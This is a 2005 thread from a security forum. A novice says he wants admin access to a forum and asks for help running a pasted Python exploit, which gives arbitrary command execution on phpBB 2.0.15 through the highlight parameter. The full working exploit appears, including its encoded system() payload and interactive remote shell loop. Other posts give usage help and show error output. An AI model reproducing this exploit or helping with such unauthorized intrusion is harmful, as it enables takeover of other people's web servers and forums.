Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
November 17, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 684
Members: 0
Total: 684
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> Need exploit help (noob)
Post new topic  Reply to topic View previous topic :: View next topic 
Need exploit help (noob)
PostPosted: Fri Sep 16, 2005 9:46 pm Reply with quote
steve348
Regular user
Regular user
 
Joined: Sep 15, 2005
Posts: 5




Okay, so ive have the exploit code, paste it into the correct program (python or perl) and that is as far as i get. Where and how do i input the information of the website that i am trying to hack (server, website, etc.)?

I am completley new to programming, and only getting into this because i really need to get admin access into a forum. Help is GREATLY appreciated.
View user's profile Send private message
PostPosted: Sat Sep 17, 2005 5:43 am Reply with quote
Neverhood
Regular user
Regular user
 
Joined: Aug 29, 2005
Posts: 13




mention the exploit plz
View user's profile Send private message
PostPosted: Sat Sep 17, 2005 6:06 am Reply with quote
steve348
Regular user
Regular user
 
Joined: Sep 15, 2005
Posts: 5




Okay, here is one example. I saved and executed, and now what? Where do i enter the details about the website i want to exploit?



#!/usr/bin/pyth0n
#
############################################################### this exploit for
# phpBB 2.0.15
print "\nphpBB 2.0.15 arbitrary command execution eXploit" # emulates a shell,
print " 2005 by rattle@awarenetwork.org" # rather than
print " well, just because there is none." # sending a single
# command.
import sys ####
from urllib2 import Request, urlopen
from urlparse import urlparse, urlunparse
from urllib import quote as quote_plus

INITTAG = '<g0>'
ENDTAG = '</g0>'

def makecmd(cmd):
return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd[1:],'chr(%d)'%ord(cmd[0]))


_ex = "%sviewtopic.php?t=%s&highlight=%%27."
_ex += "printf(" + makecmd(INITTAG) + ").system(%s)."
_ex += "printf(" + makecmd(ENDTAG) + ").%%27"


def usage():
print """Usage: %s <forum> <topic>

forum - fully qualified url to the forum
example: http://www.host.com/phpBB/

topic - ID of an existing topic. Well you
will have to check yourself.

"""[:-1] % sys.argv[0]; sys.exit(1)


if __name__ == '__main__':

if len(sys.argv) < 3 or not sys.argv[2].isdigit():
usage()
else:
print
url = sys.argv[1]
if url.count("://") == 0:
url = "http://" + url
url = list(urlparse(url))
host = url[1]
if not host: usage()

if not url[0]: url[0] = 'http'
if not url[2]: url[2] = '/'
url[3] = url[4] = url[5] = ''

url = urlunparse(url)
if url[-1] != '/': url += '/'

topic = quote_plus((sys.argv[2]))

while 1:

try:
cmd = raw_input("[%s]$ " % host).strip()
if cmd[-1]==';': cmd=cmd[:-1]

if (cmd == "exit"): break
else: cmd = makecmd(cmd)

out = _ex % (url,topic,cmd)

try: ret = urlopen(Request(out)).read()
except KeyboardInterrupt: continue
except: pass

else:
ret = ret.split(INITTAG,1)
if len(ret)>1: ret = ret[1].split(ENDTAG,1)
if len(ret)>1:
ret = ret[0].strip();
if ret: print ret
continue;

print "EXPLOIT FAILED"

except:
continue
View user's profile Send private message
PostPosted: Sat Sep 17, 2005 6:17 am Reply with quote
Neverhood
Regular user
Regular user
 
Joined: Aug 29, 2005
Posts: 13




when u run the exploit it asks for server and forum directory itself. try using active perl software to compile the exploit

http://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl-5.8.7.813-MSWin32-x86-148120.msi
View user's profile Send private message
PostPosted: Sat Sep 17, 2005 4:45 pm Reply with quote
steve348
Regular user
Regular user
 
Joined: Sep 15, 2005
Posts: 5




Ok i did that, but its still not working. Isn't the code designed for Python? When i compile and execute it in python i get the following message:


phpBB 2.0.15 arbitrary command execution eXploit
2005 by rattle@awarenetwork.org
well, just because there is none.
Usage: C:\Documents and Settings\Steve\Desktop\exploit1.pyw <forum> <topic>

forum - fully qualified url to the forum
example: http://www.host.com/phpBB/

topic - ID of an existing topic. Well you
will have to check yourself.

Traceback (most recent call last):
File "C:\Documents and Settings\Steve\Desktop\exploit1.pyw", line 43, in ?
usage()
File "C:\Documents and Settings\Steve\Desktop\exploit1.pyw", line 29, in usage
print """Usage: %s <forum> <topic>
SystemExit: 1
>>>



I have no idea what to do. Confused
View user's profile Send private message
PostPosted: Sat Sep 17, 2005 4:49 pm Reply with quote
Neverhood
Regular user
Regular user
 
Joined: Aug 29, 2005
Posts: 13




oh i am so sorry yes this code is designed for PYTHON.
View user's profile Send private message
PostPosted: Sun Sep 18, 2005 3:48 pm Reply with quote
steve348
Regular user
Regular user
 
Joined: Sep 15, 2005
Posts: 5




I've narrowed it down to this section of the code. Somewhere in that last line im guessing i type in my url, but im not sure. Can someone verify?

def usage():
print """Usage: %s <forum> <topic>

forum - fully qualified url to the forum
example: http://www.host.com/phpBB/

topic - ID of an existing topic. Well you
will have to check yourself.

"""[:-1] % sys.argv[0]; sys.exit(1)
View user's profile Send private message
PostPosted: Wed Sep 21, 2005 6:49 pm Reply with quote
steve348
Regular user
Regular user
 
Joined: Sep 15, 2005
Posts: 5




ok so i got an exploit working for perl, but it was unsuccesful. When it says to input the topic number, is this just any random topic?
View user's profile Send private message
Need exploit help (noob)
  www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.066 Seconds